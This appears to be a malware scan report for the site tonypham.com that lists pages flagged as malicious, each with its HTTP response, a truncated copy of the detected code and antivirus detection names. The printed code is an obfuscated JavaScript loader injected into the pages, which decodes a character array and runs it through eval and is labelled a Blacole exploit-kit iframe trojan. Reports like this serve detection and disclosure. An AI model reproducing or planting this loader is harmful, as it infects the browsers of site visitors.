Request | Server response | Status |
http://www.tonypham.com/ | 200 OK Content-Length: 39247 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/feed/ | 200 OK Content-Length: 15147 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/wp-content/uploads/2011/02/IMG_9626-copy-3.jpg | 200 OK Content-Length: 301184 Content-Type: image/jpeg | clean |
http://www.tonypham.com/test404page.js | 200 OK Content-Length: 28921 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/2011/05/30/charity-posadass-cotillion/ | 200 OK Content-Length: 32848 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/category/charity-posadas/ | 200 OK Content-Length: 31218 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/category/cotillion/ | 200 OK Content-Length: 39706 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/2010/05/03/513/ | 200 OK Content-Length: 34392 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/category/court/ | 200 OK Content-Length: 35103 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/category/gerika/ | 200 OK Content-Length: 35106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/2010/04/22/gerikas-court/ | 200 OK Content-Length: 33163 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/2011/05/30/thiens-rsx/ | 200 OK Content-Length: 32701 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/category/uncategorized/ | 200 OK Content-Length: 36484 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/2010/12/25/merry-christmas-happy-holidays/ | 200 OK Content-Length: 32116 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,99,115,103,111,109,30,104,99,95,99,108,110,40,96,42,98,40,121,114,100,114,117,113,108,32,76,95,116,103,44,102,107,109,111,113,38,77,96,114,104,45,112,97,109,98,111,108,38,41,41,38,98,44,95,43,48,39,41,42,95,59,124,8,102,116,108,99,115,103,111,109
... 1940 bytes are skipped ...100,44,105,109,98,101,119,77,102,39,37,95,94,101,111,110,101,108,100,103,100,98,59,39,40,59,61,44,47,41,122,98,111,98,115,109,100,108,116,45,97,111,110,105,105,100,59,39,94,93,103,110,109,103,107,99,105,99,97,61,38,41,112,112,101,99,109,107,40,40,41,39,58,30,101,119,110,105,113,99,115,60,37,43,100,118,112,45,114,111,70,75,84,82,114,114,104,108,103,39,39,43,38,57,32,111,95,116,103,59,47,38,57,125,9,123);}w=f;s=[];for(i=2-2;-i+750!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff((1*w[j]+j%zz));}xz=e;xz(s)}Antivirus reports:- AntiVir
- JS/Blacole.KI
- Avast
- JS:Iframe-AJT [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.Iframe.P
- Comodo
- TrojWare.JS.Agent.GZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Kaspersky
- Trojan-Downloader.JS.Iframe.dcs
- Microsoft
- Exploit:JS/Blacole.KI
- MicroWorld-eScan
- JS:Trojan.Iframe.P
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- JS:Trojan.Iframe.P
- AVG
- HTML/Framer
- GData
- JS:Trojan.Iframe.P
- BitDefender
- JS:Trojan.Iframe.P
|
http://www.tonypham.com/wp-content/uploads/2010/12/IMG_8587-copy1.jpg | 200 OK Content-Length: 301184 Content-Type: image/jpeg | clean |